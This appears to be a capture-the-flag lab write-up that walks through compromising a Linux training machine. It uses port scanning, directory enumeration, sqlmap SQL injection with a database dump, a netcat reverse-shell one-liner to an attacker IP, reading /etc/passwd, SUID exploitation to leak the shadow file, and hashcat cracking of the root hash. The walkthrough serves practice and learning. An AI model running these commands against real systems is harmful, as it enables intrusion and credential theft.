A guided room taking you through infiltrating and exploiting a Linux system.
Starting with Rustscan to find open ports and pipe the info to nmap.
❯ rustscan -a 10.10.5.177 -- -sC -sV -oN nmap_results
Ports 22 and 80 seem to be the only one open.
Things that stand out here:
Since, SSH is rarely ever a target for extensive enumeration, we can try to enumerate the web servers for some hidden directories.
❯ gobuster dir -u "http://10.10.5.177/" --wordlist=/usr/share/dirbuster/directory-list-2.3-medium.txt -t 75 -x "php,txt,html"
Tag | Meaning |
---|---|
dir |
Directory Search |
u |
URL to enumerate |
--wordlist |
The wordlist to use for enumeration |
-t |
The number of CPU threads to use |
-x |
The file extension to enumerate |
Thoughts: I usually only enumerate the directory, not being able to find a directory, made me realise I should enumerate file extensions too.
On enumerating file extensions, we get a directory.
Since this is a PHP Login form and PHP Login Forms are usually vulnerable to SQLi attacks, let’s try to see if it’s vulnerable to SQLi.
On entering '
in the Username field we get an error, thus confirming the earlier suspicion.
To do the injection, lets use sqlmap
to test and find the credentials.
❯ sqlmap -u "http://10.10.5.177/administrator.php" --forms --dump
Tag | Meaning |
---|---|
-u |
Specifies the URL to attack |
--forms |
To automatically select the <form> elements from the page |
--dump |
To retrieve data from the database once the SQLi is found. |
On running sqlmap
we find the required credentials.
Thoughts: This was my first brush with
sqlmap
and trying to understand its working was quite insightful
Once we login with the creds we see that,,, we can run arbitrary commands through the webserver??????? Really weird for this to happen but I’ll roll with it.
Now that we can run commands here, we can view what files there are in the current directory using ls
;
Or see the users on the system using;
cat /etc/passwd
;
It’s better to get a shell on the system now. Let’s try one of the payloads from highoncoffee. The OpenBSD payload for netcat works here;
mkfifo /tmp/lol;nc 10.11.17.66 1337 0</tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lol
Thoughts: It took me some time to figure out that I just needed to use another payload to get things to work. I should try to use different things when I get stuck.
To find the file where the password is stored as instructed by the room, we use the find
command
Thoughts: Trying to find this file was a bit annoying because I was unable to properly use the
find
command to retrieve the file. I need to do more practice in finding files and learn this command fully.
Inside this file is the required SSH password.
Logging in with SSH;
❯ ssh pingu@10.10.5.177
Now that we have a proper shell to the machine, we should enumerate the machine using LinEnum.sh. My favourite way to do this is through hosting a server on a local directory with the script and download it on the Target-Machine.
After getting the script on the server, run it to find the juicy stuff and the interesting SUID file.
Thoughts: All these are things I am a bit more familiar with so it was more fun.
As the room instructs, the SUID file takes in the shadow file in the memory; expects 32 characters of input and then exits. Following the instructions, we conduct binary exploitation.
The binary exploitation will ultimately lead to dropping of the shadow file with the root hash.
We can run this through hashcat using
❯ hashcat -m 1800 -a 0 root.txt /usr/share/wordlists/rockyou.txt
And this gives us the final password!
Thoughts on the room: This was quite an interesting room, definitely going to read up on binary exploitation later. Apart from that, I’ve realise that I should just keep doing more rooms.